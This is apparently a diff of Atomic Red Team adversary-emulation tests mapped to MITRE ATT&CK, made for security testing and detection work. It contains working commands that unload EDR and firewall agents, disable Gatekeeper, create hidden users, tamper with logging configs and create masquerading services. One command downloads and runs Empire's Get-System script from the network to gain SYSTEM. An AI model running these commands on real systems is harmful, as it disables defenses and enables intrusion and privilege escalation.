+    - name: Read volume boot sector via DOS device path (PowerShell)
+      auto_generated_guid: 88f6327e-51ec-4bbf-b2e8-3fea534eab8b
+      description: |-
+        This test uses PowerShell to open a handle on the drive volume via the `\\.\` [DOS device path specifier](https://docs.microsoft.com/en-us/dotnet/standard/io/file-path-formats#dos-device-paths) and perform direct access read of the first few bytes of the volume.
+        On success, a hex dump of the first 11 bytes of the volume is displayed.
+
+        For a NTFS volume, it should correspond to the following sequence ([NTFS partition boot sector](https://en.wikipedia.org/wiki/NTFS#Partition_Boot_Sector_(VBR))):
+        ```
+                   00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F
+
+        00000000   EB 52 90 4E 54 46 53 20 20 20 20                 ëR?NTFS
+        ```
+      supported_platforms:
+      - windows
+      input_arguments:
+        volume:
+          description: Drive letter of the volume to access
+          type: string
+          default: 'C:'
+      executor:
+        command: |
+          $buffer = New-Object byte[] 11
+          $handle = New-Object IO.FileStream "\\.\#{volume}", 'Open', 'Read', 'ReadWrite'
+          $handle.Read($buffer, 0, $buffer.Length)
+          $handle.Close()
+          Format-Hex -InputObject $buffer
+        name: powershell
+        elevation_required: true
   T1562.002:
     technique:
       external_references:
@@ -24464,10 +24646,14 @@ defense-evasion:
       supported_platforms:
       - macos
       executor:
-        command: 'sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist
-
-'
+        command: |
+          sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist
+          sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.defense.daemon.plist
+        cleanup_command: |
+          sudo launchctl load -w /Library/LaunchDaemons/com.carbonblack.daemon.plist
+          sudo launchctl load -w /Library/LaunchDaemons/com.carbonblack.defense.daemon.plist
         name: sh
+        elevation_required: true
     - name: Disable LittleSnitch
       auto_generated_guid: 62155dd8-bb3d-4f32-b31c-6532ff3ac6a3
       description: 'Disables LittleSnitch
@@ -24478,8 +24664,12 @@ defense-evasion:
       executor:
         command: 'sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
 
+'
+        cleanup_command: 'sudo launchctl load -w /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
+
 '
         name: sh
+        elevation_required: true
     - name: Disable OpenDNS Umbrella
       auto_generated_guid: 07f43b33-1e15-4e99-be70-bc094157c849
       description: 'Disables OpenDNS Umbrella
@@ -24490,8 +24680,28 @@ defense-evasion:
       executor:
         command: 'sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist
 
+'
+        cleanup_command: 'sudo launchctl load -w /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist
+
 '
         name: sh
+        elevation_required: true
+    - name: Disable macOS Gatekeeper
+      auto_generated_guid: 2a821573-fb3f-4e71-92c3-daac7432f053
+      description: 'Disables macOS Gatekeeper
+
+'
+      supported_platforms:
+      - macos
+      executor:
+        command: 'sudo spctl --master-disable
+
+'
+        cleanup_command: 'sudo spctl --master-enable
+
+'
+        name: sh
+        elevation_required: true
     - name: Stop and unload Crowdstrike Falcon on macOS
       auto_generated_guid: b3e7510c-2d4c-4249-a33f-591a2bc83eef
       description: 'Stop and unload Crowdstrike Falcon daemons falcond and userdaemon
@@ -24513,6 +24723,9 @@ defense-evasion:
         command: |
           sudo launchctl unload #{falcond_plist}
           sudo launchctl unload #{userdaemon_plist}
+        cleanup_command: |
+          sudo launchctl load -w #{falcond_plist}
+          sudo launchctl load -w #{userdaemon_plist}
         name: sh
         elevation_required: true
     - name: Unload Sysmon Filter Driver
@@ -25983,9 +26196,9 @@ defense-evasion:
           type: Path
           default: myapp.app
       executor:
-        command: |
-          sudo xattr -r -d com.apple.quarantine #{app_path}
-          sudo spctl --master-disable
+        command: 'sudo xattr -d com.apple.quarantine #{app_path}
+
+'
         elevation_required: true
         name: sh
   T1484:
@@ -26470,9 +26683,10 @@ defense-evasion:
       - macOS
       identifier: T1564.002
     atomic_tests:
-    - name: Hidden Users
+    - name: Create Hidden User using UniqueID < 500
       auto_generated_guid: 4238a7f0-a980-4fff-98a2-dfc0a363d507
-      description: 'Add a hidden user on MacOS
+      description: 'Add a hidden user on macOS using Unique ID < 500 (users with that
+        ID are hidden by default)
 
 '
       supported_platforms:
@@ -26488,6 +26702,27 @@ defense-evasion:
 '
         cleanup_command: 'sudo dscl . -delete /Users/#{user_name}
 
+'
+        elevation_required: true
+        name: sh
+    - name: Create Hidden User using IsHidden option
+      auto_generated_guid: de87ed7b-52c3-43fd-9554-730f695e7f31
+      description: 'Add a hidden user on macOS using IsHidden optoin
+
+'
+      supported_platforms:
+      - macos
+      input_arguments:
+        user_name:
+          description: username to add
+          type: string
+          default: APT
+      executor:
+        command: 'sudo dscl . -create /Users/#{user_name} IsHidden 1
+
+'
+        cleanup_command: 'sudo dscl . -delete /Users/#{user_name}
+
 '
         elevation_required: true
         name: sh
@@ -26816,7 +27051,86 @@ defense-evasion:
       - Anti-virus
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
-    atomic_tests: []
+      identifier: T1562.006
+    atomic_tests:
+    - name: Auditing Configuration Changes on Linux Host
+      auto_generated_guid: 212cfbcf-4770-4980-bc21-303e37abd0e3
+      description: 'Emulates modification of auditd configuration files
+
+'
+      supported_platforms:
+      - linux
+      input_arguments:
+        audisp_config_file_name:
+          description: The name of the audispd configuration file to be changed
+          type: string
+          default: audispd.conf
+        auditd_config_file_name:
+          description: The name of the auditd configuration file to be changed
+          type: string
+          default: auditd.conf
+        libaudit_config_file_name:
+          description: The name of the libaudit configuration file to be changed
+          type: string
+          default: libaudit.conf
+      executor:
+        command: "sed -i '$ a #art_test_1562_006_1' /etc/audisp/#{audisp_config_file_name}\nif
+          [ -f \"/etc/#{auditd_config_file_name}\" ];\nthen sed -i '$ a #art_test_1562_006_1'
+          /etc/#{auditd_config_file_name}\nelse sed -i '$ a #art_test_1562_006_1'
+          /etc/audit/#{auditd_config_file_name}\nfi \nsed -i '$ a #art_test_1562_006_1'
+          /etc/#{libaudit_config_file_name}\n"
+        cleanup_command: |
+          sed -i '$ d' /etc/audisp/#{audisp_config_file_name}
+          if [ -f "/etc/#{auditd_config_file_name}" ];
+          then sed -i '$ d' /etc/#{auditd_config_file_name}
+          else sed -i '$ d' /etc/audit/#{auditd_config_file_name}
+          fi
+          sed -i '$ d' /etc/#{libaudit_config_file_name}
+        name: bash
+        elevation_required: true
+    - name: Lgging Configuration Changes on Linux Host
+      auto_generated_guid: 7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c
+      description: 'Emulates modification of syslog configuration.
+
+'
+      supported_platforms:
+      - linux
+      input_arguments:
+        syslog_config_file_name:
+          description: The name of the syslog configuration file to be changed
+          type: string
+          default: syslog.conf
+        rsyslog_config_file_name:
+          description: The name of the rsyslog configuration file to be changed
+          type: string
+          default: rsyslog.conf
+        syslog_ng_config_file_name:
+          description: The name of the syslog-ng configuration file to be changed
+          type: string
+          default: syslog-ng.conf
+      executor:
+        command: |
+          if [ -f "/etc/#{syslog_config_file_name}" ];
+          then sed -i '$ a #art_test_1562_006_2' /etc/#{syslog_config_file_name}
+          fi
+          if [ -f "/etc/#{rsyslog_config_file_name}" ];
+          then sed -i '$ a #art_test_1562_006_2' /etc/#{rsyslog_config_file_name}
+          fi
+          if [ -f "/etc/syslog-ng/#{syslog_ng_config_file_name}" ];
+          then sed -i '$ a #art_test_1562_006_2' /etc/syslog-ng/#{syslog_ng_config_file_name}
+          fi
+        cleanup_command: |
+          if [ -f "/etc/#{syslog_config_file_name}" ];
+          then sed -i '$ d' /etc/#{syslog_config_file_name}
+          fi
+          if [ -f "/etc/#{rsyslog_config_file_name}" ];
+          then sed -i '$ d' /etc/#{rsyslog_config_file_name}
+          fi
+          if [ -f "/etc/syslog-ng/#{syslog_ng_config_file_name}" ];
+          then sed -i '$ d' /etc/syslog-ng/#{syslog_ng_config_file_name}
+          fi
+        name: bash
+        elevation_required: true
   T1027.005:
     technique:
       id: attack-pattern--b0533c6e-8fea-4788-874f-b799cacc4b92
@@ -27024,6 +27338,24 @@ defense-evasion:
           forfiles /p c:\windows\system32 /m notepad.exe /c #{process}
           forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe"
         name: command_prompt
+    - name: Indirect Command Execution - conhost.exe
+      auto_generated_guid: cf3391e0-b482-4b02-87fc-ca8362269b29
+      description: |
+        conhost.exe refers to a host process for the console window. It provide an interface between command prompt and Windows explorer.
+        Executing it through command line can create process ancestry anomalies
+        [Reference] (http://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/)
+      supported_platforms:
+      - windows
+      input_arguments:
+        process:
+          description: Process to execute
+          type: string
+          default: notepad.exe
+      executor:
+        command: 'conhost.exe "#{process}"
+
+'
+        name: command_prompt
   T1553.004:
     technique:
       id: attack-pattern--c615231b-f253-4f58-9d47-d5b4cbdb6839
@@ -28569,7 +28901,38 @@ defense-evasion:
       x_mitre_platforms:
       - Windows
       - Linux
-    atomic_tests: []
+      identifier: T1036.004
+    atomic_tests:
+    - name: Creating W32Time similar named service using schtasks
+      auto_generated_guid: f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9
+      description: Creating W32Time similar named service (win32times) using schtasks
+        just like threat actor dubbed "Operation Wocao"
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          schtasks /create /ru system /sc daily /tr "cmd /c powershell.exe -ep bypass -file c:\T1036.004_NonExistingScript.ps1" /tn win32times /f
+          schtasks /query /tn win32times
+        cleanup_command: 'schtasks /tn win32times /delete /f
+
+'
+        name: command_prompt
+        elevation_required: true
+    - name: Creating W32Time similar named service using sc
+      auto_generated_guid: b721c6ef-472c-4263-a0d9-37f1f4ecff66
+      description: Creating W32Time similar named service (win32times) using sc just
+        like threat actor dubbed "Operation Wocao"
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          sc create win32times binPath= "cmd /c start c:\T1036.004_NonExistingScript.ps1"
+          sc qc win32times
+        cleanup_command: 'sc delete win32times
+
+'
+        name: command_prompt
+        elevation_required: true
   T1036:
     technique:
       id: attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0
@@ -34332,7 +34695,60 @@ defense-evasion:
       - Signature-based detection
       - Host forensic analysis
       - Anti-virus
-    atomic_tests: []
+      identifier: T1497.001
+    atomic_tests:
+    - name: Detect Virtualization Environment (Linux)
+      auto_generated_guid: dfbd1a21-540d-4574-9731-e852bd6fe840
+      description: |
+        systemd-detect-virt detects execution in a virtualized environment.
+        At boot, dmesg stores a log if a hypervisor is detected.
+      supported_platforms:
+      - linux
+      executor:
+        name: sh
+        elevation_required: true
+        command: 'if (systemd-detect-virt || sudo dmidecode | egrep -i ''manufacturer|product|vendor''
+          | grep -iE ''Oracle|VirtualBox|VMWare|Parallels'') then echo "Virtualization
+          Environment detected"; fi;
+
+'
+    - name: Detect Virtualization Environment (Windows)
+      auto_generated_guid: 502a7dc4-9d6f-4d28-abf2-f0e84692562d
+      description: 'Windows Management Instrumentation(WMI) objects contains system
+        information which helps to detect virtualization. This command will specifically
+        attempt to get the CurrentTemperature value from this object and will check
+        to see if the attempt results in an error that contains the word supported.
+        This is meant to find the result of Not supported, which is the result if
+        run in a virtual machine
+
+'
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $error.clear()
+          Get-WmiObject -Query "SELECT * FROM MSAcpi_ThermalZoneTemperature" -ErrorAction SilentlyContinue
+          if($error) {echo "Virtualization Environment detected"}
+        cleanup_command: "$error.clear()\n"
+    - name: Detect Virtualization Environment (MacOS)
+      auto_generated_guid: a960185f-aef6-4547-8350-d1ce16680d09
+      description: 'ioreg contains registry entries for all the device drivers in
+        the system. If it''s a virtual machine, one of the device manufacturer will
+        be a Virtualization Software.
+
+'
+      supported_platforms:
+      - macos
+      executor:
+        name: sh
+        elevation_required: false
+        command: 'if (ioreg -l | grep -e Manufacturer -e ''Vendor Name'' | grep -iE
+          ''Oracle|VirtualBox|VMWare|Parallels'') then echo ''Virtualization Environment
+          detected''; fi;
+
+'
   T1542.001:
     technique:
       id: attack-pattern--16ab6452-c3c1-497c-a47d-206018ca1ada
@@ -35006,7 +35422,34 @@ defense-evasion:
       - File system access controls
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
-    atomic_tests: []
+      identifier: T1134.001
+    atomic_tests:
+    - name: Named pipe client impersonation
+      auto_generated_guid: 90db9e27-8e7c-4c04-b602-a45927884966
+      description: |-
+        Uses PowerShell and Empire's [GetSystem module](https://github.com/BC-SECURITY/Empire/blob/v3.4.0/data/module_source/privesc/Get-System.ps1). The script creates a named pipe, and a service that writes to that named pipe. When the service connects to the named pipe, the script impersonates its security context.
+        When executed successfully, the test displays the domain and name of the account it's impersonating (local SYSTEM).
+
+        Reference: https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/
+      supported_platforms:
+      - windows
+      executor:
+        command: IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1');
+          Get-System -Technique NamedPipe -Verbose
+        name: powershell
+        elevation_required: true
+    - name: "`SeDebugPrivilege` token duplication"
+      auto_generated_guid: 34f0a430-9d04-4d98-bcb5-1989f14719f0
+      description: |-
+        Uses PowerShell and Empire's [GetSystem module](https://github.com/BC-SECURITY/Empire/blob/v3.4.0/data/module_source/privesc/Get-System.ps1). The script uses `SeDebugPrivilege` to obtain, duplicate and impersonate the token of a another process.
+        When executed successfully, the test displays the domain and name of the account it's impersonating (local SYSTEM).
+      supported_platforms:
+      - windows
+      executor:
+        command: IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1');
+          Get-System -Technique Token -Verbose
+        name: powershell
+        elevation_required: true
   T1205:
     technique:
       revoked: false
@@ -40771,19 +41214,29 @@ discovery:
           get-process | ?{$_.Description -like "*defender*"}
           get-process | ?{$_.Description -like "*cylance*"}
         name: powershell
-    - name: Security Software Discovery - ps
+    - name: Security Software Discovery - ps (macOS)
       auto_generated_guid: ba62ce11-e820-485f-9c17-6f3c857cd840
       description: |
         Methods to identify Security Software on an endpoint
-        when sucessfully executed, command shell  is going to display AV software it is running( Little snitch or carbon black ).
+        when sucessfully executed, command shell  is going to display AV/Security software it is running.
       supported_platforms:
-      - linux
       - macos
       executor:
-        command: |
-          ps -ef | grep Little\ Snitch | grep -v grep
-          ps aux | grep CbOsxSensorService
-          ps aux | grep falcond
+        command: 'ps aux | egrep ''Little\ Snitch|CbOsxSensorService|falcond|nessusd|santad|CbDefense|td-agent|packetbeat|filebeat|auditbeat|osqueryd|BlockBlock|LuLu''
+
+'
+        name: sh
+    - name: Security Software Discovery - ps (Linux)
+      auto_generated_guid: 23b91cd2-c99c-4002-9e41-317c63e024a2
+      description: |
+        Methods to identify Security Software on an endpoint
+        when sucessfully executed, command shell  is going to display AV/Security software it is running.
+      supported_platforms:
+      - linux
+      executor:
+        command: 'ps aux | egrep ''falcond|nessusd|cbagentd|td-agent|packetbeat|filebeat|auditbeat|osqueryd''
+
+'
         name: sh
     - name: Security Software Discovery - Sysmon Service
       auto_generated_guid: fe613cf3-8009-4446-9a0f-bc78a15b66c9
@@ -40984,7 +41437,60 @@ discovery:
       - Signature-based detection
       - Host forensic analysis
       - Anti-virus
-    atomic_tests: []
+      identifier: T1497.001
+    atomic_tests:
+    - name: Detect Virtualization Environment (Linux)
+      auto_generated_guid: dfbd1a21-540d-4574-9731-e852bd6fe840
+      description: |
+        systemd-detect-virt detects execution in a virtualized environment.
+        At boot, dmesg stores a log if a hypervisor is detected.
+      supported_platforms:
+      - linux
+      executor:
+        name: sh
+        elevation_required: true
+        command: 'if (systemd-detect-virt || sudo dmidecode | egrep -i ''manufacturer|product|vendor''
+          | grep -iE ''Oracle|VirtualBox|VMWare|Parallels'') then echo "Virtualization
+          Environment detected"; fi;
+
+'
+    - name: Detect Virtualization Environment (Windows)
+      auto_generated_guid: 502a7dc4-9d6f-4d28-abf2-f0e84692562d
+      description: 'Windows Management Instrumentation(WMI) objects contains system
+        information which helps to detect virtualization. This command will specifically
+        attempt to get the CurrentTemperature value from this object and will check
+        to see if the attempt results in an error that contains the word supported.
+        This is meant to find the result of Not supported, which is the result if
+        run in a virtual machine
+
+'
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $error.clear()
+          Get-WmiObject -Query "SELECT * FROM MSAcpi_ThermalZoneTemperature" -ErrorAction SilentlyContinue
+          if($error) {echo "Virtualization Environment detected"}
+        cleanup_command: "$error.clear()\n"
+    - name: Detect Virtualization Environment (MacOS)
+      auto_generated_guid: a960185f-aef6-4547-8350-d1ce16680d09
+      description: 'ioreg contains registry entries for all the device drivers in
+        the system. If it''s a virtual machine, one of the device manufacturer will
+        be a Virtualization Software.
+
+'
+      supported_platforms:
+      - macos
+      executor:
+        name: sh
+        elevation_required: false
+        command: 'if (ioreg -l | grep -e Manufacturer -e ''Vendor Name'' | grep -iE
+          ''Oracle|VirtualBox|VMWare|Parallels'') then echo ''Virtualization Environment
+          detected''; fi;
+
+'
   T1082:
     technique:
       created: '2017-05-31T21:31:04.307Z'
@@ -41325,6 +41831,26 @@ discovery:
 
 '
         name: powershell
+    - name: List macOS Firewall Rules
+      auto_generated_guid: ff1d8c25-2aa4-4f18-a425-fede4a41ee88
+      description: "\"This will test if the macOS firewall is enabled and/or show
+        what rules are configured. Must be run with elevated privileges. Upon successful
+        execution, these commands will output various information about the firewall
+        configuration, including status and specific port/protocol blocks or allows.
+        \n\nUsing `defaults`, additional arguments can be added to see filtered details,
+        such as `globalstate` for global configuration (\\\"Is it on or off?\\\"),
+        `firewall` for common application allow rules, and `explicitauths` for specific
+        rules configured by the user. \n\nUsing `socketfilterfw`, flags such as --getglobalstate
+        or --listapps can be used for similar filtering. At least one flag is required
+        to send parseable output to standard out. \n"
+      supported_platforms:
+      - macos
+      executor:
+        command: |
+          sudo defaults read /Library/Preferences/com.apple.alf
+          sudo /usr/libexec/ApplicationFirewall/socketfilterfw --getglobalstate
+        name: bash
+        elevation_required: true
   T1049:
     technique:
       object_marking_refs:
@@ -51938,6 +52464,32 @@ collection:
 
 '
         name: bash
+    - name: Windows Screencapture
+      auto_generated_guid: 3c898f62-626c-47d5-aad2-6de873d69153
+      description: 'Use Psr.exe binary to collect screenshots of user display. Test
+        will do left mouse click to simulate user behaviour
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        output_file:
+          description: Output file path
+          type: Path
+          default: c:\temp\T1113_desktop.zip
+        recording_time:
+          description: Time to take screenshots
+          type: String
+          default: 5
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          cmd /c start /b psr.exe /start /output #{output_file} /sc 1 /gui 0 /stopevent 12
+          Add-Type -MemberDefinition '[DllImport("user32.dll")] public static extern void mouse_event(int flags, int dx, int dy, int cButtons, int info);' -Name U32 -Namespace W;
+          [W.U32]::mouse_event(0x02 -bor 0x04 -bor 0x01, 0, 0, 0, 0);
+          cmd /c "timeout #{recording_time} > NULL && psr.exe /stop"
+        cleanup_command: 'rm #{output_file}'
   T1213.002:
     technique:
       external_references:

atomics/T1006/T1006.md

@@ -0,0 +1,52 @@
+# T1006 - Direct Volume Access
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1006)
+<blockquote>Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique bypasses Windows file access controls as well as file system monitoring tools. (Citation: Hakobyan 2009)
+
+Utilities, such as NinjaCopy, exist to perform these actions in PowerShell. (Citation: Github PowerSploit Ninjacopy)</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Read volume boot sector via DOS device path (PowerShell)](#atomic-test-1---read-volume-boot-sector-via-dos-device-path-powershell)
+
+
+<br/>
+
+## Atomic Test #1 - Read volume boot sector via DOS device path (PowerShell)
+This test uses PowerShell to open a handle on the drive volume via the `\\.\` [DOS device path specifier](https://docs.microsoft.com/en-us/dotnet/standard/io/file-path-formats#dos-device-paths) and perform direct access read of the first few bytes of the volume.
+On success, a hex dump of the first 11 bytes of the volume is displayed.
+
+For a NTFS volume, it should correspond to the following sequence ([NTFS partition boot sector](https://en.wikipedia.org/wiki/NTFS#Partition_Boot_Sector_(VBR))):
+```
+           00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F
+
+00000000   EB 52 90 4E 54 46 53 20 20 20 20                 ëR?NTFS
+```
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| volume | Drive letter of the volume to access | string | C:|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+$buffer = New-Object byte[] 11
+$handle = New-Object IO.FileStream "\\.\#{volume}", 'Open', 'Read', 'ReadWrite'
+$handle.Read($buffer, 0, $buffer.Length)
+$handle.Close()
+Format-Hex -InputObject $buffer
+```
+
+
+
+
+
+
+<br/>

atomics/T1006/T1006.yaml

@@ -0,0 +1,31 @@
+attack_technique: T1006
+display_name: Direct Volume Access
+atomic_tests:
+- name: Read volume boot sector via DOS device path (PowerShell)
+  auto_generated_guid: 88f6327e-51ec-4bbf-b2e8-3fea534eab8b
+  description: |-
+    This test uses PowerShell to open a handle on the drive volume via the `\\.\` [DOS device path specifier](https://docs.microsoft.com/en-us/dotnet/standard/io/file-path-formats#dos-device-paths) and perform direct access read of the first few bytes of the volume.
+    On success, a hex dump of the first 11 bytes of the volume is displayed.
+
+    For a NTFS volume, it should correspond to the following sequence ([NTFS partition boot sector](https://en.wikipedia.org/wiki/NTFS#Partition_Boot_Sector_(VBR))):
+    ```
+               00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F
+
+    00000000   EB 52 90 4E 54 46 53 20 20 20 20                 ëR?NTFS
+    ```
+  supported_platforms:
+  - windows
+  input_arguments:
+    volume:
+      description: Drive letter of the volume to access
+      type: string
+      default: 'C:'
+  executor:
+    command: |
+      $buffer = New-Object byte[] 11
+      $handle = New-Object IO.FileStream "\\.\#{volume}", 'Open', 'Read', 'ReadWrite'
+      $handle.Read($buffer, 0, $buffer.Length)
+      $handle.Close()
+      Format-Hex -InputObject $buffer
+    name: powershell
+    elevation_required: true

atomics/T1016/T1016.md

@@ -16,6 +16,8 @@ Adversaries may use the information from [System Network Configuration Discovery
 
 - [Atomic Test #5 - List Open Egress Ports](#atomic-test-5---list-open-egress-ports)
 
+- [Atomic Test #6 - List macOS Firewall Rules](#atomic-test-6---list-macos-firewall-rules)
+
 
 <br/>
 
@@ -206,4 +208,33 @@ Invoke-WebRequest "#{portfile_url}" -OutFile "#{port_file}"
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #6 - List macOS Firewall Rules
+"This will test if the macOS firewall is enabled and/or show what rules are configured. Must be run with elevated privileges. Upon successful execution, these commands will output various information about the firewall configuration, including status and specific port/protocol blocks or allows. 
+
+Using `defaults`, additional arguments can be added to see filtered details, such as `globalstate` for global configuration (\"Is it on or off?\"), `firewall` for common application allow rules, and `explicitauths` for specific rules configured by the user. 
+
+Using `socketfilterfw`, flags such as --getglobalstate or --listapps can be used for similar filtering. At least one flag is required to send parseable output to standard out.
+
+**Supported Platforms:** macOS
+
+
+
+
+
+#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
+
+
+```bash
+sudo defaults read /Library/Preferences/com.apple.alf
+sudo /usr/libexec/ApplicationFirewall/socketfilterfw --getglobalstate
+```
+
+
+
+
+
+
 <br/>

atomics/T1016/T1016.yaml

@@ -122,4 +122,20 @@ atomic_tests:
     cleanup_command: |
       Remove-Item -ErrorAction ignore "#{output_file}"
     name: powershell
-
+- name: List macOS Firewall Rules
+  auto_generated_guid: ff1d8c25-2aa4-4f18-a425-fede4a41ee88
+  description: |
+    "This will test if the macOS firewall is enabled and/or show what rules are configured. Must be run with elevated privileges. Upon successful execution, these commands will output various information about the firewall configuration, including status and specific port/protocol blocks or allows. 
+    
+    Using `defaults`, additional arguments can be added to see filtered details, such as `globalstate` for global configuration (\"Is it on or off?\"), `firewall` for common application allow rules, and `explicitauths` for specific rules configured by the user. 
+    
+    Using `socketfilterfw`, flags such as --getglobalstate or --listapps can be used for similar filtering. At least one flag is required to send parseable output to standard out. 
+  supported_platforms:
+  - macos
+  executor:
+    command: |
+      sudo defaults read /Library/Preferences/com.apple.alf
+      sudo /usr/libexec/ApplicationFirewall/socketfilterfw --getglobalstate
+    name: bash
+    elevation_required: true
+  

atomics/T1036.004/T1036.004.md

@@ -0,0 +1,71 @@
+# T1036.004 - Masquerade Task or Service
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1036/004)
+<blockquote>Adversaries may attempt to manipulate the name of a task or service to make it appear legitimate or benign. Tasks/services executed by the Task Scheduler or systemd will typically be given a name and/or description.(Citation: TechNet Schtasks)(Citation: Systemd Service Units) Windows services will have a service name as well as a display name. Many benign tasks and services exist that have commonly associated names. Adversaries may give tasks or services names that are similar or identical to those of legitimate ones.
+
+Tasks or services contain other fields, such as a description, that adversaries may attempt to make appear legitimate.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Fysbis Dr Web Analysis)</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Creating W32Time similar named service using schtasks](#atomic-test-1---creating-w32time-similar-named-service-using-schtasks)
+
+- [Atomic Test #2 - Creating W32Time similar named service using sc](#atomic-test-2---creating-w32time-similar-named-service-using-sc)
+
+
+<br/>
+
+## Atomic Test #1 - Creating W32Time similar named service using schtasks
+Creating W32Time similar named service (win32times) using schtasks just like threat actor dubbed "Operation Wocao"
+
+**Supported Platforms:** Windows
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+schtasks /create /ru system /sc daily /tr "cmd /c powershell.exe -ep bypass -file c:\T1036.004_NonExistingScript.ps1" /tn win32times /f
+schtasks /query /tn win32times
+```
+
+#### Cleanup Commands:
+```cmd
+schtasks /tn win32times /delete /f
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #2 - Creating W32Time similar named service using sc
+Creating W32Time similar named service (win32times) using sc just like threat actor dubbed "Operation Wocao"
+
+**Supported Platforms:** Windows
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+sc create win32times binPath= "cmd /c start c:\T1036.004_NonExistingScript.ps1"
+sc qc win32times
+```
+
+#### Cleanup Commands:
+```cmd
+sc delete win32times
+```
+
+
+
+
+
+<br/>

atomics/T1036.004/T1036.004.yaml

@@ -0,0 +1,29 @@
+attack_technique: T1036.004
+display_name: 'Masquerading: Masquerade Task or Service'
+atomic_tests:
+- name: Creating W32Time similar named service using schtasks
+  auto_generated_guid: f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9
+  description: Creating W32Time similar named service (win32times) using schtasks just like threat actor dubbed "Operation Wocao"
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      schtasks /create /ru system /sc daily /tr "cmd /c powershell.exe -ep bypass -file c:\T1036.004_NonExistingScript.ps1" /tn win32times /f
+      schtasks /query /tn win32times
+    cleanup_command: |
+      schtasks /tn win32times /delete /f
+    name: command_prompt
+    elevation_required: true
+- name: Creating W32Time similar named service using sc
+  auto_generated_guid: b721c6ef-472c-4263-a0d9-37f1f4ecff66
+  description: Creating W32Time similar named service (win32times) using sc just like threat actor dubbed "Operation Wocao"
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      sc create win32times binPath= "cmd /c start c:\T1036.004_NonExistingScript.ps1"
+      sc qc win32times
+    cleanup_command: |
+      sc delete win32times
+    name: command_prompt
+    elevation_required: true

atomics/T1113/T1113.md

@@ -13,6 +13,8 @@
 
 - [Atomic Test #4 - Capture Linux Desktop using Import Tool](#atomic-test-4---capture-linux-desktop-using-import-tool)
 
+- [Atomic Test #5 - Windows Screencapture](#atomic-test-5---windows-screencapture)
+
 
 <br/>
 
@@ -158,4 +160,41 @@ sudo apt-get install imagemagick
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #5 - Windows Screencapture
+Use Psr.exe binary to collect screenshots of user display. Test will do left mouse click to simulate user behaviour
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| output_file | Output file path | Path | c:&#92;temp&#92;T1113_desktop.zip|
+| recording_time | Time to take screenshots | String | 5|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+cmd /c start /b psr.exe /start /output #{output_file} /sc 1 /gui 0 /stopevent 12
+Add-Type -MemberDefinition '[DllImport("user32.dll")] public static extern void mouse_event(int flags, int dx, int dy, int cButtons, int info);' -Name U32 -Namespace W;
+[W.U32]::mouse_event(0x02 -bor 0x04 -bor 0x01, 0, 0, 0, 0);
+cmd /c "timeout #{recording_time} > NULL && psr.exe /stop"
+```
+
+#### Cleanup Commands:
+```powershell
+rm #{output_file}
+```
+
+
+
+
+
 <br/>

atomics/T1113/T1113.yaml

@@ -77,4 +77,28 @@ atomic_tests:
     cleanup_command: |
       rm #{output_file}
     name: bash
-
+- name: Windows Screencapture
+  auto_generated_guid: 3c898f62-626c-47d5-aad2-6de873d69153
+  description: |
+    Use Psr.exe binary to collect screenshots of user display. Test will do left mouse click to simulate user behaviour
+  supported_platforms:
+    - windows
+  input_arguments:
+    output_file:
+      description: Output file path
+      type: Path
+      default: c:\temp\T1113_desktop.zip
+    recording_time:
